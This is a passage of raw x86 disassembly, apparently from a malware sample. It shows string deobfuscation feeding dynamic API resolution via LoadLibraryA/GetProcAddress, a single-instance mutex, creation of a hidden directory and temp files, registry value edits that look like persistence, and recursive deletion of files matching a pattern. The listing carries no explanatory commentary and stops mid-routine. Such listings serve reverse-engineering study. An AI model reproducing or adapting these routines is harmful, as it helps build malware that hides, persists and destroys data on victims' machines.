loc_40992F: ; CODE XREF: sub_409713+56�j
; sub_409713+182�j ...
mov eax, 0FFFFFF36h
jmp short loc_409925
; ---------------------------------------------------------------------------
loc_409936: ; CODE XREF: sub_409713+AC�j
mov eax, 0FFFFFF35h
jmp short loc_409925
; ---------------------------------------------------------------------------
loc_40993D: ; CODE XREF: sub_409713+F8�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, edx
sub eax, [ebp+arg_4]
cmp edx, [ebp+arg_4]
sbb ecx, ecx
and ecx, 0FFFFFFFCh
add ecx, 0FFFFFF37h
neg eax
sbb eax, eax
and eax, ecx
jmp short loc_40996A
; ---------------------------------------------------------------------------
loc_409960: ; CODE XREF: sub_409713+1D3�j
mov eax, [ebp+arg_C]
mov [eax], esi
mov eax, 0FFFFFF35h
loc_40996A: ; CODE XREF: sub_409713+21A�j
; sub_409713+24B�j
pop edi
pop esi
pop ebx
leave
retn
sub_409713 endp
; =============== S U B R O U T I N E =======================================
sub_40996F proc near ; CODE XREF: sub_4069E5+28�p
; sub_4069E5+54�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor ecx, ecx
xor al, al
cmp [esi], cl
push edi
mov edi, [esp+8+arg_4]
jle short loc_40999D
mov dl, 0BAh
push ebx
loc_409984: ; CODE XREF: sub_40996F+2B�j
mov bl, [ecx+esi+1]
add bl, dl
inc al
mov [ecx+edi], bl
movsx ebx, byte ptr [esi]
movzx ecx, al
add dl, 2
cmp ecx, ebx
jl short loc_409984
pop ebx
loc_40999D: ; CODE XREF: sub_40996F+10�j
movzx eax, al
mov byte ptr [eax+edi], 0
mov eax, edi
pop edi
pop esi
retn
sub_40996F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4099A9 proc near ; CODE XREF: sub_40A555+C�p
; sub_40A555+2C�p ...
var_34 = byte ptr -34h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_40996F
pop ecx
pop ecx
push eax
call dword_40FD08 ; LoadLibraryA
mov ebx, eax
xor edi, edi
cmp ebx, edi
jz short loc_409A03
cmp [ebp+arg_8], di
jbe short loc_409A03
loc_4099D5: ; CODE XREF: sub_4099A9+58�j
mov ecx, [ebp+arg_4]
movzx eax, di
lea esi, [ecx+eax*8]
lea eax, [ebp+var_34]
push eax
push dword ptr [esi]
call sub_40996F
pop ecx
pop ecx
push eax
push ebx
call dword_40FD04 ; GetProcAddress
test eax, eax
jz short loc_409A0A
mov ecx, [esi+4]
inc edi
cmp di, [ebp+arg_8]
mov [ecx], eax
jb short loc_4099D5
loc_409A03: ; CODE XREF: sub_4099A9+24�j
; sub_4099A9+2A�j
mov eax, ebx
loc_409A05: ; CODE XREF: sub_4099A9+63�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409A0A: ; CODE XREF: sub_4099A9+4C�j
xor eax, eax
jmp short loc_409A05
sub_4099A9 endp
; =============== S U B R O U T I N E =======================================
sub_409A0E proc near ; CODE XREF: sub_40A4C3+3C�p
; sub_40B583+1A3�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, [esp+8+arg_8]
test esi, esi
jnz short loc_409A22
lea esi, [esp+8+arg_0]
jmp short loc_409A3D
; ---------------------------------------------------------------------------
loc_409A22: ; CODE XREF: sub_409A0E+C�j
push ebx
call sub_4092F9
test eax, eax
pop ecx
mov [esi], eax
jz short loc_409A6C
push ebx
push [esp+0Ch+arg_0]
push eax
call sub_409331
add esp, 0Ch
loc_409A3D: ; CODE XREF: sub_409A0E+12�j
xor eax, eax
test ebx, ebx
jbe short loc_409A6A
push edi
loc_409A44: ; CODE XREF: sub_409A0E+59�j
test al, 1
mov ecx, [esi]
jnz short loc_409A59
lea edi, [ecx+eax]
mov cl, al
add cl, cl
mov dl, 0F6h
sub dl, cl
add [edi], dl
jmp short loc_409A64
; ---------------------------------------------------------------------------
loc_409A59: ; CODE XREF: sub_409A0E+3A�j
mov dl, al
add dl, dl
add ecx, eax
add dl, 7
add [ecx], dl
loc_409A64: ; CODE XREF: sub_409A0E+49�j
inc eax
cmp eax, ebx
jb short loc_409A44
pop edi
loc_409A6A: ; CODE XREF: sub_409A0E+33�j
mov eax, ebx
loc_409A6C: ; CODE XREF: sub_409A0E+1F�j
pop esi
pop ebx
retn
sub_409A0E endp
; =============== S U B R O U T I N E =======================================
sub_409A6F proc near ; CODE XREF: sub_4035F5+C1�p
; sub_403956+39�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, [esp+8+arg_8]
test esi, esi
jnz short loc_409A83
lea esi, [esp+8+arg_0]
jmp short loc_409AA1
; ---------------------------------------------------------------------------
loc_409A83: ; CODE XREF: sub_409A6F+C�j
lea eax, [ebx+10h]
push eax
call sub_4092F9
test eax, eax
pop ecx
mov [esi], eax
jz short loc_409AD0
push ebx
push [esp+0Ch+arg_0]
push eax
call sub_409331
add esp, 0Ch
loc_409AA1: ; CODE XREF: sub_409A6F+12�j
xor eax, eax
test ebx, ebx
jbe short loc_409ACE
push edi
loc_409AA8: ; CODE XREF: sub_409A6F+5C�j
test al, 1
mov ecx, [esi]
jnz short loc_409ABB
mov dl, al
add dl, 5
add ecx, eax
add dl, dl
add [ecx], dl
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409ABB: ; CODE XREF: sub_409A6F+3D�j
lea edi, [ecx+eax]
mov cl, al
add cl, cl
mov dl, 0F9h
sub dl, cl
add [edi], dl
loc_409AC8: ; CODE XREF: sub_409A6F+4A�j
inc eax
cmp eax, ebx
jb short loc_409AA8
pop edi
loc_409ACE: ; CODE XREF: sub_409A6F+36�j
mov eax, ebx
loc_409AD0: ; CODE XREF: sub_409A6F+22�j
pop esi
pop ebx
retn
sub_409A6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD3 proc near ; CODE XREF: sub_4035F5+E4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, 4
ja short loc_409AE3
xor eax, eax
jmp short loc_409B29
; ---------------------------------------------------------------------------
loc_409AE3: ; CODE XREF: sub_409AD3+A�j
push esi
mov esi, [ebp+arg_0]
mov eax, [esi]
push edi
push eax
mov [ebp+arg_4], eax
call sub_4092F9
test eax, eax
mov edi, [ebp+arg_8]
pop ecx
mov [edi], eax
jz short loc_409B25
lea ecx, [ebp+arg_4]
push ecx
push eax
add ebx, 0FFFFFFFCh
push ebx
add esi, 4
push esi
call sub_409713
add esp, 10h
test eax, eax
jnz short loc_409B1D
mov eax, [ebp+arg_4]
test eax, eax
jnz short loc_409B27
loc_409B1D: ; CODE XREF: sub_409AD3+41�j
push dword ptr [edi]
call sub_409317
pop ecx
loc_409B25: ; CODE XREF: sub_409AD3+28�j
xor eax, eax
loc_409B27: ; CODE XREF: sub_409AD3+48�j
pop edi
pop esi
loc_409B29: ; CODE XREF: sub_409AD3+E�j
pop ebx
pop ebp
retn
sub_409AD3 endp
; =============== S U B R O U T I N E =======================================
sub_409B2C proc near ; CODE XREF: sub_403723+64�p
; sub_403723+BB�p ...
arg_0 = dword ptr 4
push 20h
push [esp+4+arg_0]
call dword_40FDB4 ; SetFileAttributesW
push [esp+arg_0]
call dword_40FDB0 ; DeleteFileW
test eax, eax
setnz al
retn
sub_409B2C endp
; =============== S U B R O U T I N E =======================================
sub_409B48 proc near ; CODE XREF: sub_4034E8+A�p
; sub_403723+78�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
push 0
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
mov esi, eax
push 0FFFFFFFFh
push esi
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_409B7B
cmp eax, 80h
jz short loc_409B7B
push esi
call dword_40FDAC ; CloseHandle
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_409B7B: ; CODE XREF: sub_409B48+1F�j
; sub_409B48+26�j
mov eax, esi
pop esi
retn
sub_409B48 endp
; =============== S U B R O U T I N E =======================================
sub_409B7F proc near ; CODE XREF: sub_4034E8+78�p
; sub_4035AD+2C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_40FD84 ; ReleaseMutex
push [esp+arg_0]
call dword_40FDAC ; CloseHandle
retn
sub_409B7F endp
; =============== S U B R O U T I N E =======================================
sub_409B94 proc near ; CODE XREF: .text:00405458�p
; .text:00405488�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_40FDE8 ; GetTickCount
cmp dword_40FEBC, eax
jz short loc_409BA9
mov dword_40FEBC, eax
jmp short loc_409BAE
; ---------------------------------------------------------------------------
loc_409BA9: ; CODE XREF: sub_409B94+C�j
mov eax, dword_40FEB8
loc_409BAE: ; CODE XREF: sub_409B94+13�j
mov ecx, [esp+arg_4]
imul eax, 343FDh
sub ecx, [esp+arg_0]
add eax, 269EC3h
inc ecx
mov dword_40FEB8, eax
jz short locret_409BD3
xor edx, edx
div ecx
mov eax, edx
add eax, [esp+arg_0]
locret_409BD3: ; CODE XREF: sub_409B94+33�j
retn
sub_409B94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BD4 proc near ; CODE XREF: sub_404AAD+19�p
; sub_40BA83+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov al, [ebp+arg_C]
push ebx
push esi
xor ebx, ebx
push ebx
neg al
push ebx
push [ebp+arg_8]
push ebx
push 1
sbb eax, eax
and eax, 40000000h
or eax, 80000000h
push eax
push [ebp+arg_0]
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_4]
mov [esi+8], eax
jz short loc_409C84
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_40FD40 ; GetFileSizeEx
test eax, eax
jz short loc_409C7B
cmp [ebp+var_4], ebx
jnz short loc_409C7B
mov eax, [ebp+var_8]
cmp eax, ebx
mov [esi+4], eax
jnz short loc_409C32
mov [esi+0Ch], ebx
mov [esi], ebx
loc_409C2E: ; CODE XREF: sub_409BD4+9C�j
mov al, 1
jmp short loc_409C86
; ---------------------------------------------------------------------------
loc_409C32: ; CODE XREF: sub_409BD4+53�j
xor eax, eax
cmp [ebp+arg_C], bl
push ebx
setnz al
push ebx
push ebx
lea eax, [eax+eax+2]
push eax
push ebx
push dword ptr [esi+8]
call dword_40FD44 ; CreateFileMappingW
cmp eax, ebx
mov [esi+0Ch], eax
jz short loc_409C7B
push dword ptr [esi+4]
xor ecx, ecx
cmp [ebp+arg_C], bl
push ebx
setz cl
push ebx
lea ecx, [ecx+ecx+2]
push ecx
push eax
call dword_40FD48 ; MapViewOfFile
cmp eax, ebx
mov [esi], eax
jnz short loc_409C2E
push dword ptr [esi+0Ch]
call dword_40FDAC ; CloseHandle
loc_409C7B: ; CODE XREF: sub_409BD4+44�j
; sub_409BD4+49�j ...
push dword ptr [esi+8]
call dword_40FDAC ; CloseHandle
loc_409C84: ; CODE XREF: sub_409BD4+35�j
xor al, al
loc_409C86: ; CODE XREF: sub_409BD4+5C�j
pop esi
pop ebx
leave
retn
sub_409BD4 endp
; =============== S U B R O U T I N E =======================================
sub_409C8A proc near ; CODE XREF: sub_404AAD+158�p
; sub_40BA83+33�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
test eax, eax
jz short loc_409C9C
push eax
call dword_40FD4C ; UnmapViewOfFile
loc_409C9C: ; CODE XREF: sub_409C8A+9�j
mov eax, [esi+0Ch]
test eax, eax
jz short loc_409CAA
push eax
call dword_40FDAC ; CloseHandle
loc_409CAA: ; CODE XREF: sub_409C8A+17�j
mov esi, [esi+8]
test esi, esi
jz short loc_409CB8
push esi
call dword_40FDAC ; CloseHandle
loc_409CB8: ; CODE XREF: sub_409C8A+25�j
pop esi
retn
sub_409C8A endp
; =============== S U B R O U T I N E =======================================
sub_409CBA proc near ; CODE XREF: sub_4034A0+10�p
; sub_409CE2+10�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and word ptr [eax], 0
mov ecx, dword_40FC20
and cl, 1
neg cl
push 1
sbb ecx, ecx
and ecx, 0FFFFFFF5h
add ecx, 25h
push ecx
push eax
push 0
call dword_40FBA8
retn
sub_409CBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CE2 proc near ; CODE XREF: sub_404416+A8�p
var_400 = word ptr -400h
var_3FC = dword ptr -3FCh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push esi
call sub_409CBA
pop ecx
xor edi, edi
push edi
push 2000000h
push 3
push edi
push 3
push 80000000h
push esi
call dword_40FDC0 ; CreateFileW
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [esi], di
jz short loc_409D6B
lea eax, [ebp+arg_0]
push eax
push 400h
lea eax, [ebp+var_400]
push eax
push 1
push ebx
mov [ebp+arg_0], edi
call dword_40FC28
test eax, eax
jnz short loc_409D64
cmp [ebp+var_400], 104h
jnb short loc_409D64
movzx eax, [ebp+var_400]
mov ecx, [ebp+var_3FC]
mov [ecx+eax*2], di
push [ebp+var_3FC]
push esi
call dword_40FD98 ; lstrcpyW
loc_409D64: ; CODE XREF: sub_409CE2+57�j
; sub_409CE2+62�j
push ebx
call dword_40FDAC ; CloseHandle
loc_409D6B: ; CODE XREF: sub_409CE2+37�j
pop edi
pop esi
pop ebx
leave
retn
sub_409CE2 endp
; =============== S U B R O U T I N E =======================================
sub_409D70 proc near ; CODE XREF: .text:004053BD�p
; sub_4057EE+25�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_409CBA
mov eax, dword_40FB34
pop ecx
push dword ptr [eax+0Ch]
push esi
push esi
call dword_40FC8C
pop esi
retn
sub_409D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D8E proc near ; CODE XREF: sub_404222+7B�p
; sub_406E98+1C�p ...
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call dword_40FE5C ; GetProcessTimes
push [ebp+arg_8]
mov eax, dword_40FB34
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+var_8]
push dword ptr [eax+60h]
push 104h
push [ebp+arg_C]
call dword_40FC84
add esp, 1Ch
leave
retn
sub_409D8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD4 proc near ; CODE XREF: sub_403723+181�p
; sub_407164+53�p
var_208 = byte ptr -208h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
lea eax, [ebp+var_208]
push eax
push 104h
call dword_40FE70 ; GetTempPathW
push [ebp+arg_0]
lea eax, [ebp+var_208]
push 0
push offset dword_403180
push eax
call dword_40FE90 ; GetTempFileNameW
leave
retn
sub_409DD4 endp
; =============== S U B R O U T I N E =======================================
sub_409E08 proc near ; CODE XREF: sub_406B85+2D�p
; sub_40AAA0+26�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ebx
and esi, 0FFFF0000h
push edi
jz short loc_409E60
loc_409E19: ; CODE XREF: sub_409E08+56�j
push 40h
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_409E58
cmp word ptr [esi], 5A4Dh
jnz short loc_409E58
mov eax, [esi+3Ch]
lea edi, [eax+esi]
cmp edi, ebx
ja short loc_409E58
push 0F8h
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_409E58
cmp dword ptr [edi], 4550h
jnz short loc_409E58
mov eax, [edi+50h]
add eax, esi
cmp eax, ebx
ja short loc_409E66
loc_409E58: ; CODE XREF: sub_409E08+1C�j
; sub_409E08+23�j ...
sub esi, 10000h
jnz short loc_409E19
loc_409E60: ; CODE XREF: sub_409E08+F�j
xor eax, eax
loc_409E62: ; CODE XREF: sub_409E08+60�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_409E66: ; CODE XREF: sub_409E08+4E�j
mov eax, esi
jmp short loc_409E62
sub_409E08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409E6A proc near ; CODE XREF: sub_403723+A�p
; sub_4057EE+43�p ...
var_208 = byte ptr -208h
push ebp
mov ebp, esp
lea eax, [ebp+var_208]
sub esp, 208h
push eax
call sub_409CBA
mov eax, dword_40FB34
pop ecx
push dword ptr [eax]
lea eax, [ebp+var_208]
push eax
push eax
call dword_40FC8C
push 0
lea eax, [ebp+var_208]
push eax
call dword_40FE6C ; CreateDirectoryW
push 6
lea eax, [ebp+var_208]
push eax
call dword_40FDB4 ; SetFileAttributesW
leave
retn
sub_409E6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EB5 proc near ; CODE XREF: .text:004053E6�p
; .text:00405556�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
push [ebp+arg_0]
xor bl, bl
call dword_40FD90 ; lstrlenW
xor esi, esi
push esi
mov edi, eax
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push esi
push 3
push esi
push esi
push esi
push dword ptr [eax+48h]
mov [ebp+var_C], edi
push 80000002h
call dword_40FBE0
test eax, eax
jnz loc_409FF9
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push esi
push esi
push esi
mov [ebp+var_8], esi
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBDC
mov eax, [ebp+var_8]
lea eax, [eax+edi*2+0Ah]
push eax
mov [ebp+var_8], eax
call sub_4092F9
mov edi, eax
cmp edi, esi
pop ecx
jz loc_409FE9
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push edi
push esi
push esi
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBDC
mov ebx, edi
mov ecx, edi
loc_409F48: ; CODE XREF: sub_409EB5+C7�j
movzx eax, word ptr [ebx]
cmp ax, si
jz short loc_409F56
cmp ax, 2Ch
jnz short loc_409F75
loc_409F56: ; CODE XREF: sub_409EB5+99�j
mov eax, ebx
sub eax, ecx
sar eax, 1
cmp eax, [ebp+var_C]
jnz short loc_409F72
push [ebp+var_C]
push [ebp+arg_0]
push ecx
call dword_40FC78
test eax, eax
jz short loc_409F7E
loc_409F72: ; CODE XREF: sub_409EB5+AA�j
lea ecx, [ebx+2]
loc_409F75: ; CODE XREF: sub_409EB5+9F�j
cmp [ebx], si
jz short loc_409F82
inc ebx
inc ebx
jmp short loc_409F48
; ---------------------------------------------------------------------------
loc_409F7E: ; CODE XREF: sub_409EB5+BB�j
mov bl, 1
jmp short loc_409FE2
; ---------------------------------------------------------------------------
loc_409F82: ; CODE XREF: sub_409EB5+C3�j
push edi
call dword_40FD90 ; lstrlenW
mov esi, eax
test esi, esi
jbe short loc_409F9E
cmp word ptr [edi+esi*2-2], 2Ch
jz short loc_409F9E
mov word ptr [edi+esi*2], 2Ch
inc esi
loc_409F9E: ; CODE XREF: sub_409EB5+D8�j
; sub_409EB5+E0�j
push [ebp+arg_0]
lea eax, [edi+esi*2]
push eax
call dword_40FD98 ; lstrcpyW
add esi, [ebp+var_C]
push offset asc_403184 ; ","
lea eax, [edi+esi*2]
push eax
call dword_40FD98 ; lstrcpyW
lea eax, [esi+esi+4]
push eax
mov eax, dword_40FB34
push edi
push 1
push 0
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBE8
mov ebx, eax
neg ebx
sbb bl, bl
inc bl
xor esi, esi
loc_409FE2: ; CODE XREF: sub_409EB5+CB�j
push edi
call sub_409317
pop ecx
loc_409FE9: ; CODE XREF: sub_409EB5+71�j
push [ebp+var_4]
call dword_40FBE4
test bl, bl
jnz short loc_40A042
mov edi, [ebp+var_C]
loc_409FF9: ; CODE XREF: sub_409EB5+3B�j
push esi
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push esi
push 2
push esi
push esi
push esi
push dword ptr [eax+4Ch]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_40A042
lea eax, [edi+edi+2]
push eax
push [ebp+arg_0]
mov eax, dword_40FB34
push 1
push esi
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBE8
push [ebp+var_4]
mov bl, 1
call dword_40FBE4
loc_40A042: ; CODE XREF: sub_409EB5+13F�j
; sub_409EB5+164�j
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
sub_409EB5 endp
; =============== S U B R O U T I N E =======================================
sub_40A049 proc near ; CODE XREF: sub_408413+8D�p
arg_0 = dword ptr 4
mov eax, dword_40FB34
push dword ptr [eax+5Ch]
push [esp+4+arg_0]
call dword_40FD88 ; lstrcmpiW
neg eax
sbb al, al
inc al
retn
sub_40A049 endp
; =============== S U B R O U T I N E =======================================
sub_40A062 proc near ; CODE XREF: sub_407570+25A�p
; sub_40B046+2D�p
mov eax, dword_40FB34
push esi
push edi
mov esi, 10000000h
push esi
push 0
push dword ptr [eax+90h]
call dword_40FB04
mov edi, eax
test edi, edi
jz short loc_40A0C7
push edi
call dword_40FB0C
test eax, eax
jz short loc_40A0C7
push edi
call dword_40FB08
mov eax, dword_40FB34
push esi
push 0
push 0
push dword ptr [eax+94h]
call dword_40FB10
mov esi, eax
test esi, esi
jz short loc_40A0C7
push esi
call dword_40FB18
test eax, eax
jz short loc_40A0C7
push esi
call dword_40FB14
mov al, 1
jmp short loc_40A0C9
; ---------------------------------------------------------------------------
loc_40A0C7: ; CODE XREF: sub_40A062+1F�j
; sub_40A062+2A�j ...
xor al, al
loc_40A0C9: ; CODE XREF: sub_40A062+63�j
pop edi
pop esi
retn
sub_40A062 endp
; =============== S U B R O U T I N E =======================================
sub_40A0CC proc near ; CODE XREF: sub_407335+203�p
; sub_408088+B1�p
push esi
push 2
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
mov eax, dword_40FB34
push dword ptr [eax+54h]
push 80000001h
call dword_40FCA0
mov eax, dword_40FB34
push dword ptr [eax+54h]
mov esi, 80000002h
push esi
call dword_40FCA0
mov eax, dword_40FB34
push dword ptr [eax+58h]
push esi
call dword_40FCA0
push 3E8h
call dword_40FD68 ; Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, dword_40FB34
push 0Eh
push dword ptr [eax+30h]
call sub_4095AA
add esp, 18h
pop esi
retn
sub_40A0CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A137 proc near ; CODE XREF: sub_40AE6F+172�p
var_214 = byte ptr -214h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 214h
push ebx
lea eax, [ebp+var_8]
push eax
push 8
push [ebp+arg_0]
xor ebx, ebx
call dword_40FBD0
test eax, eax
jz short loc_40A1CE
push esi
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push 1
push [ebp+var_8]
mov [ebp+var_4], ebx
call dword_40FBD4
push [ebp+var_4]
call sub_4092F9
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40A1C4
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push esi
push 1
push [ebp+var_8]
call dword_40FBD4
test eax, eax
jz short loc_40A1BD
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov [ebp+var_4], 103h
push dword ptr [esi]
push ebx
call dword_40FBD8
test eax, eax
jz short loc_40A1BD
mov bl, 1
loc_40A1BD: ; CODE XREF: sub_40A137+58�j
; sub_40A137+82�j
push esi
call sub_409317
pop ecx
loc_40A1C4: ; CODE XREF: sub_40A137+41�j
push [ebp+var_8]
call dword_40FDAC ; CloseHandle
pop esi
loc_40A1CE: ; CODE XREF: sub_40A137+1D�j
mov al, bl
pop ebx
leave
retn
sub_40A137 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1D3 proc near ; CODE XREF: sub_407335+34�p
; .text:0040C979�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 0F0000060h
push 1
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_10]
push eax
mov [ebp+var_1], bl
call dword_40FC04
test eax, eax
jz short loc_40A25D
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push 8003h
push [ebp+var_10]
call dword_40FC08
test eax, eax
jz short loc_40A253
push ebx
push [ebp+arg_8]
mov [ebp+var_C], 10h
push [ebp+arg_4]
push [ebp+var_8]
call dword_40FC0C
test eax, eax
jz short loc_40A24A
push ebx
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
push 2
push [ebp+var_8]
call dword_40FC10
test eax, eax
jz short loc_40A24A
cmp [ebp+var_C], 10h
jnz short loc_40A24A
mov [ebp+var_1], 1
loc_40A24A: ; CODE XREF: sub_40A1D3+54�j
; sub_40A1D3+6B�j ...
push [ebp+var_8]
call dword_40FC14
loc_40A253: ; CODE XREF: sub_40A1D3+39�j
push ebx
push [ebp+var_10]
call dword_40FC18
loc_40A25D: ; CODE XREF: sub_40A1D3+21�j
mov al, [ebp+var_1]
pop ebx
leave
retn
sub_40A1D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A263 proc near ; CODE XREF: sub_403B25+22�p
; sub_4086F4+78�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
lea ecx, [ebp+var_4]
push ecx
push eax
push [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+arg_0]
push eax
push eax
call dword_40FE10 ; CreateThread
push eax
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_4]
leave
retn
sub_40A263 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A28B proc near ; CODE XREF: sub_404C11+150�p
; sub_40A28B+B1�p
var_458 = byte ptr -458h
var_250 = dword ptr -250h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = word ptr -220h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 458h
push esi
push edi
push offset dword_40103C
push [ebp+arg_0]
lea eax, [ebp+var_458]
push eax
call dword_40FC8C
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_458]
push eax
call dword_40FE94 ; FindFirstFileW
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
jz loc_40A371
push ebx
loc_40A2CD: ; CODE XREF: sub_40A28B+D8�j
cmp [ebp+var_224], 2Eh
jnz short loc_40A2F5
cmp [ebp+var_222], 0
jz short loc_40A353
cmp [ebp+var_222], 2Eh
jnz short loc_40A2F5
cmp [ebp+var_220], 0
jz short loc_40A353
loc_40A2F5: ; CODE XREF: sub_40A28B+4A�j
; sub_40A28B+5E�j
mov ebx, [ebp+var_250]
shr ebx, 4
and bl, 1
jnz short loc_40A317
push [ebp+arg_4]
lea eax, [ebp+var_224]
push eax
call dword_40FC9C
test eax, eax
jz short loc_40A353
loc_40A317: ; CODE XREF: sub_40A28B+76�j
lea eax, [ebp+var_224]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_458]
push eax
call dword_40FC8C
test bl, bl
lea eax, [ebp+var_458]
jz short loc_40A347
push [ebp+arg_4]
push eax
call sub_40A28B
pop ecx
pop ecx
add edi, eax
jmp short loc_40A353
; ---------------------------------------------------------------------------
loc_40A347: ; CODE XREF: sub_40A28B+AB�j
push eax
call sub_409B2C
test al, al
pop ecx
jz short loc_40A353
inc edi
loc_40A353: ; CODE XREF: sub_40A28B+54�j
; sub_40A28B+68�j ...
lea eax, [ebp+var_250]
push eax
push esi
call dword_40FE98 ; FindNextFileW
test eax, eax
jnz loc_40A2CD
push esi
call dword_40FE9C ; FindClose
pop ebx
loc_40A371: ; CODE XREF: sub_40A28B+3B�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40A28B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A377 proc near ; CODE XREF: sub_407335:loc_40754D�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_4]
push eax
push 28h
